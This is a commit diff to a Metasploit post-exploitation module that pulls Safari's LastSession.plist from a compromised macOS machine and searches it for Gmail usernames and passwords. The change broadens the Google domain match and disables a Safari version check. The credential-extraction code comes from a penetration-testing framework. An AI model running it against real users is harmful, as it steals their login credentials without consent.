Land #2798, @wchen-r7 update to safari post module

bug/bundler_fix
jvazquez-r7 2013-12-25 10:24:39 -06:00
commit c2783c2746
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 15 additions and 9 deletions

View File

@ -15,10 +15,14 @@ class Metasploit3 < Msf::Post
'Name' => 'OSX Gather Safari LastSession.plist',
'Description' => %q{
This module downloads the LastSession.plist file from the target machine.
LastSession.plist is used by Safari to track active websites in the current
session, and sometimes contains sensitive information such as usernames and
passwords. This module will first download the original LastSession.plist,
and then attempt to find the credential for Gmail.
LastSession.plist is used by Safari to track active websites in the current session,
and sometimes contains sensitive information such as usernames and passwords.
This module will first download the original LastSession.plist, and then attempt
to find the credential for Gmail. The Gmail's last session state may contain the
user's credential if his/her first login attempt failed (likely due to a typo),
and then the page got refreshed or another login attempt was made. This also means
the stolen credential might contains typos.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r'],
@ -111,16 +115,16 @@ class Metasploit3 < Msf::Post
#
# Returns the <dict> session element
# @param xml [REXML::Element] The array element for the session data
# @param domain [String] The domain to search for
# @param domain [Regexp] The domain to search for
# @return [REXML::Element] The <dict> element for the session data
#
def get_session_element(xml, domain)
def get_session_element(xml, domain_regx)
dict = nil
found = false
xml.each_element do |e|
e.elements['array/dict'].each_element do |e2|
if e2.text =~ /#{domain}/
if e2.text =~ domain_regx
dict = e
found = true
break
@ -141,7 +145,7 @@ class Metasploit3 < Msf::Post
#
def find_gmail_cred(xml)
vprint_status("#{peer} - Looking for username/password for Gmail.")
gmail_dict = get_session_element(xml, 'mail.google.com')
gmail_dict = get_session_element(xml, /(mail|accounts)\.google\.com/)
return '' if gmail_dict.nil?
raw_data = gmail_dict.elements['array/dict/data'].text
@ -179,6 +183,7 @@ class Metasploit3 < Msf::Post
#
# If this is an unpatched version, we try to extract creds
#
=begin
version = get_safari_version
if version.blank?
print_warning("Unable to determine Safari version, will try to extract creds anyway")
@ -188,6 +193,7 @@ class Metasploit3 < Msf::Post
else
vprint_status("#{peer} - Safari version: #{version}")
end
=end
#
# Attempts to convert the XML file to an actual XML object, with the <array> element